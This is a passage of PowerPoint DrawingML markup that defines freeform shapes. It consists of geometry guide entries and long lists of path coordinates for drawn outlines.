                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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16"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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16" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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164" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
